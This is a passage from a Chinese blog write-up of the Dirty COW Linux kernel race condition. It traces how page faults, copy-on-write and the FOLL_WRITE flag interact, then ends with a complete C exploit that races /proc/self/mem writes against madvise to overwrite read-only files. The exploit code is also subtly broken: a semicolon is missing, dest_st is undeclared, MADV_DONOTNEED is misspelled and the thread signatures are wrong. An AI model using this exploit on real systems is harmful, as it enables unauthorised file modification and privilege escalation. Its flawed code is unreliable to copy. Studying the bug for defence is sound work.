if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) //第二次缺页异常会走到这里,清除 FOLL_WRITE 标志位
*flags &= ~FOLL_WRITE;
return 0;
}
第一次触发缺页异常
第一次调用 follow_page_mask
时,由于页表项和页表为空,所以其返回 NULL,从而进入 faultin_page
进行缺页处理。最后会调用到 do_cow_fault
这个函数,该函数会返回0,所以会再次执行follow_page_mask
第二次触发缺页异常
由于我们对该页并无写权限, 所以follow_page_mask
依旧会返回 NULL ,再次触发缺页异常,于是我们再次进入 faultin_page
函数进行处理。这一次会成功获取到了一个可写的内存页,此时 faultin_page
函数会清除 foll_flags
的 FOLL_WRITE
标志位
接下来的流程最终回到 __get_user_pages
的 retry 标签,第三次尝试获取内存页,此时 foll_flags
的 FOLL_WRITE
标志位已经被清除,内核认为是一个读操作,于是 follow_page_mask
函数成功获取到该内存页,接下来便是常规的写入流程, COW 结束
漏洞分析
在上述写/proc/self/mem
时,整个流程大致如下:
/*
mem_rw
__get_free_page
......
__access_remote_vm
......
__get_user_pages
follow_page_mask ==> 调度内存页
faultin_page ==> 处理缺页异常
handle_mm_fault ==> 这里就是我们上面分析的缺页异常处理的流程了
*/
第一次调用 follow_page_mask
时,由于页表项和页表为空,所以其返回 NULL,从而进入 faultin_page
进行缺页处理。最后会调用到 do_cow_fault
这个函数,该函数会返回0,所以会再次执行follow_page_mask
第二次调用 follow_page_mask
时,此时页表的映射,pte
等都已经填充好了,可以看上面的do_cow_fault
分析。但是这里页表标志位只可读,而我们要写,所以会再次返回NULL,然后再次进入 faultin_page
进行缺页处理。最后会调用到 do_wp_page
这个函数,这时会重用 do_cow_fault
分配的内存页,并清除 foll_flags
的 FOLL_WRITE
标志位
第三次调用 follow_page_mask
时,此时 FoLL_WRITE
标志位已经被清除,相当于一个读请求,所以会取回该内存页,那么用户在进行写的时候就不好同步到磁盘
但是如果在第2次与第3次之间,有另外一个线程使用madvise(addr, len, MADV_DONTNEED)
去告诉内核该页面不在使用,那么在第3次时,会再次进入 follow_page_mask->faultin_page->follow_page_mask
,这里会返回 page_cache
页面
正常调用流程大致如下:
/*
follow_page_mask() // 页未映射,进行 faultin_page 处理
👇
faultin_page() // 最后调用到 do_cow_fault,即创建一个匿名页(此时并未开始写入)
👇
follow_page_mask() // 由于访问属性 flags 中有 FOLL_WRITE标志,而匿名页面只读;权限不匹配,进行 faultin_page 处理
👇
faultin_page() // 最后调用到 do_wp_page,重用上述匿名页,并删除 flags 中的 FOLL_WRITE 标志
👇
follow_page_mask() // 没有 FOLL_WRITE 标志后,权限检查通过,成功获取到匿名页面 page
👇
返回上一级函数 👉 kmap,进行数据的写入,此时写入针对的是匿名页 page,不会影响 page_cache 中的数据
*/
dirtycow
调用流程:
/*
follow_page_mask() // 页未映射,进行 faultin_page 处理
👇
faultin_page() // 最后调用到 do_cow_fault,即创建一个匿名页(此时并未开始写入)
👇
follow_page_mask() // 由于访问属性 flags 中有 FOLL_WRITE标志,而匿名页面只读;权限不匹配,进行 faultin_page 处理
👇
faultin_page() // 最后调用到 do_wp_page,重用上述匿名页,并删除 flags 中的 FOLL_WRITE 标志
👇👉👉👉👉👉 // race,madvise 告诉内核上述匿名页已经被释放,即页表项等已经被清除
follow_page_mask() // 所以这里会再次发现:页未映射,进行 faultin_page 处理,但是 flags 中已没有 FOLL_WRITE 标志
👇
faultin_page() // 由于没有 FOLL_WRITE 标志,所以被当作一次读操作,所以会直接将 page_cache 进行映射
👇
follow_page_mask() // 成功返回 page_cache 页面
👇
返回上一级函数 👉 kmap,进行数据的写入,这里就导致直接写 page_cache 了,所以最后会修改磁盘文件内容
*/
漏洞利用
这个漏洞比较老了,似乎都打上补丁了,我试了好几个内核版本都不行,这里记录一个 exp
吧。
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
void* map;
void useage()
{
puts("useage: ./exp dest_file dirty_data")
exit(-1);
}
void write_func(void* args)
{
int fd = open("/proc/self/mem", O_RDWR);
for (int i = 0; i < 0x100000; i++)
{
lseek(fd, (off_t)map, SEEK_SET);
write(fd, args, strlen(args));
}
}
void madvise_func(void* args)
{
for (int i = 0; i < 0x100000; i++)
{
madvise(map, 0x100, MADV_DONOTNEED);
}
}
int main(int argc, char** argv, char** env)
{
if (argc < 3) useage();
pthread_t write_thr, madvise_thr;
int dest_fd;
dest_fd = open(argv[1], O_RDONLY);
fstat(dest_fd,&dest_st);
map = mmap(NULL, dest_st.st_size, PROT_READ, MAP_PRIVATE, dest_fd, 0);
pthread_create(&madvise_thr, NULL, madvise_func, NULL);
pthread_create(&write_thr, NULL, write_func, argv[2]);
pthread_join(write_thr, NULL);
pthread_join(madvise_thr, NULL);
return 0;
}
发表评论
您还未登录,请先登录。
登录